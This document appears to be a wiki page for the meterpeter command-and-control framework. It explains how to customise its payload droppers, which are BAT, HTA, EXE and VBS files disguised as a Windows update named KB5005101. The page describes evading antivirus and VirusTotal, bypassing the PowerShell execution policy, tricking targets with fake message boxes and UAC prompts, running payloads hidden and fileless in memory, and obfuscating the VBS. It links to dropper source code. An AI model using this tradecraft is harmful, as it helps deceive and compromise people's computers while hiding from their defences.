working with meterpeter payload droppers

Description

meterpeter C2 auto-creates client (payload) dropper(s) in three diferent file formats (BAT | HTA | EXE), all of the droppers are capable of auto-change-PS-ExecutionPolicy to 'Unrestricted' to be abble to silent run PS1 scripts, all droppers will also spawn a messagebox (dialogbox) or any type of Social Engineering technic to better trick target user into executing our payload.

Why use dropper(s) insted of using the actual payload file?

• The dropper does not contain any malicious code that can be easy flagged by AV
  
• The dropper performs PS execution Policy bypass before download\execute the real payload
  
• The dropper performs manual UAC elevation (UAC dialogbox) before download\execute the real payload
  
• The dropper will download\execute our payload in a background process detach from parent process (hidden)
  
• The dropper can be safe deleted after execution, because our payload its running in a diferent process (orphan)
  
• Normally people scans payloads on virustotal (or similar websites), this way they are scanning the dropper sourcecode (not malicious) and leave the payload sourcecode alone ;) ..
  
  

Remark

• $Env:TMP its the client (payload) default Working Directory (remote host)
  
• Update-KB5005101.bat & Update-KB5005101.exe allow droppers to spawn UAC dialog box(s) to run elevated.
  
• LanManServer 'running' on target is mandatory requirement to trigger UAC elevation on Update-KB5005101.bat
  

Article Quick Jump List

• meterpeter - Manual edit KB5005101.bat for faster execution
  
• meterpeter - Manual edit KB5005101.hta to supress Social Engineering msgboxs
  
• meterpeter - Manual edit KB5005101.exe to supress Social Engineering msgboxs
  
• meterpeter - Manual edit KB5005101.vbs to supress Social Engineering msgboxs
  
  

---

KB5005101.bat

Id	Dropper file name	Format	Detection	Execution
1	Update-KB5005101.bat	BAT	Undetected	PS ExecutionPolicy bypass + Social Engineering(Get-HotFix) Spawns a mimimized cmd prompt for a few seconds while downloading\executing the client in a background process

Manual edit Update-KB5005101.bat and delete the follow lines for faster batch execution:

The service LanManServer 'running' on target is a mandatory requirement to trigger UAC elevation on Update-KB5005101.bat. If sellected UAC elevation on Batch file and the service its stoped, then the dropper will enter in an infinite loop (not good). To prevent that a new function its added to Batch dropper that cheks for LanManServer service state before spawning the UAC dialogbox. If the service its stoped on target machine, then the dropper will be executed under 'UserLand' privileges token.

The 2º line in the batch file makes the cmd prompt to start in 'minimized' state ..

• Article Quick Jump List
  
  

---

KB5005101.hta

Id	Dropper file name	Format	Detection	Execution
2	Update-KB5005101.hta	HTA	Undetected	PS ExecutionPolicy bypass + Social Engineering msgbox. downloads\execute the client in a background process

Manual edit Update.hta and delete the follow lines to supress mgsbox displays:

Manual edit Update.hta and delete the follow line to supress auto-set-powershell-execution-policy-to-unrestricted:

• Remark: some meterpeter modules migth malfunction in displaying module stdout when using HTA droppers ..
• Article Quick Jump List
  
  

---

KB5005101.exe

Id	Dropper file name	Format	Detection	Execution
3	Update-KB5005101.exe	EXE	Suspicious	uac (admin) \ nouac (user) + Social Engineering msgbox. downloads\execute the client in a background process

Manual edit update.ps1 and change the next value to supress dropper msgbox displays:

Manual edit update.ps1 and delete the follow cmdline to supress auto-set-powershell-execution-policy-to-unrestricted:

• Article Quick Jump List
  
  

---

KB5005101.vbs

Id	Dropper file name	Format	Detection	Execution
4	Update-KB5005101.vbs	VBS	Undetected	PS ExecutionPolicy bypass + Social Engineering msgbox + UAC elevation dialogbox + vbscript auto-delete-in-the-end + downloads\execute the client in a background process

The sellected function checks if the current process (shell) its running under administrator pivileges...

• If not it spawns an UAC dialogbox to be abble to run in an elevated context (administrator privileges)
  

Final Notes:

• This vbs template will be heavily obfuscated with the help of vbs_obfuscator.vbs from @DoctorLai

• Article Quick Jump List
  
  

---

Easter Egg - Program.cs(EXE) 'FileLess' Payload Dropper

Id	Dropper file name	Format	Detection	Execution
Not Available	User Input	EXE	UnDetected	FileLess exec of client.ps1 in RAM (does not touch disk)

The follow Program.cs (not implemented in @Meterpeter yet) can be Manually compiled to standalone executable to download\execute our client.ps1 in ram ( FileLess ), for that just change the 'Program.StartInfo.Arguments()' API to point to our client.ps1, Then download CsOnTheFly.ps1 cmdlet to compile the Program.cs into standalone executable.

• https://github.com/r00t-3xp10it/meterpeter/blob/master/mimiRatz/CScrandle_fileless.cs

• https://gist.github.com/r00t-3xp10it/434fea2e7247fe8d27ccf44107dcc14d#gistcomment-4036392

• https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/fileless-threats

• Article Quick Jump List
  
  

---